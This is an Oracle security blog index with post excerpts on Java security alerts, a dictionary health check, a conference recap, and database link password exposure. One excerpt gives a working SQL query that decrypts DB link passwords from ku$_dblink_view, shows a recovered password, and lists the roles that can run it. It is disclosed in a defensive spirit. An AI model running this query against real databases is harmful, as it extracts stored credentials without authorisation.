Paul Wright
(nix, oracle, java, www, cloud ) intersect (safety, security, reliability, integrity)
Another Java Security Alert
Hi Oracle Security Folks,
Following the tradition for one off Java Security Alerts:
Oracle Critical Patch Updates and Security Alerts: http://www.oracle.com/technetwork/topics/security/alerts-086861.html
Oracle Security Alert for CVE-2013-1493: http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html
The reporters http://blog.fireeye.com/research/2013/02/yaj0-yet-another-java-zero-day-2.html say it is an unreliable exploit. Of course it depends on Java being used in the browser so one fix is to unplug the JVM [...]
Oracle Dictionary Integrity Health Check
Hi,
It is good to check the integrity or health of a system to avoid future problems.
EXEC DBMS_HM.RUN_CHECK('Dictionary Integrity Check', 'my_run');
SET LONG 100000
SET LONGCHUNKSIZE 1000
SET PAGESIZE 1000
SET LINESIZE 512
SELECT DBMS_HM.GET_RUN_REPORT('MY_RUN') from dual;
SQL> SELECT DBMS_HM.GET_RUN_REPORT('MY_RUN') from dual;
DBMS_HM.GET_RUN_REPORT('MY_RUN')
-------------------------------------------------------------------------------
-------------------------------------------------------------------------------
-------------------------------------------------------------------------------
-------------------------------------------------------------------------------
Basic Run Information
Run Name : my_run
Run [...]
Java Security Alert
New Year – New vulnerabilities…yes it’s alert season again, with the main patch out on the 15th, but an out of band alert today for the Java 0 day. It is good to see Oracle taking this well publicised issue so seriously. Here is the alert – http://www.oracle.com/technetwork/topics/security/alerts-086861.html For an excellent advanced analysis please see [...]
UKOUG 2012 in a nutshell
Hi Oracle Security Folks, UKOUG 2012 in a nutshell: OAK Table day highlight was Julian’s analysis of RAT capture formats, which made reverse engineering proprietary formats look a lot easier than it should do. Christian’s super secret talk was so secret that it was not given, but managed to catch up on that later. Monday [...]
SYS Security
Hello Folks,
A few people have told me that they thought only SYS could select db link passwords. Truth is any user with SELECT_CATALOG_ROLE can select the passwords from ku$_dblink_view as well.
SQL> select name, userid, utl_raw.cast_to_varchar2(dbms_crypto.decrypt((substr(passwordx,19)), 4353, (substr(passwordx,3,16)))) password from ku$_dblink_view;
NAME
--------------------------------------------------------------------------------
USERID
------------------------------
PASSWORD
--------------------------------------------------------------------------------
TEST_LINK.ENTERPRISE.INTERNAL.UK
DBLINK_ACCOUNT
mongo
If missing execute on [...]
Database Link Security
Hello Oracle Security folks,
Good news and bad news – which would you like first? Ok.. so the bad news is that these users/roles/privileges can select and decrypt DBLink passwords on 11.2, as the key to decrypt the ciphertext is included in the password itself.
• SYS
• SYSDBA
• DBA
• SYS WITHOUT SYSDBA
• SYSASM
• EXP_FULL_DATABASE
• DATAPUMP_EXP_FULL_DATABASE
• DATAPUMP_IMP_FULL_DATABASE
[...]


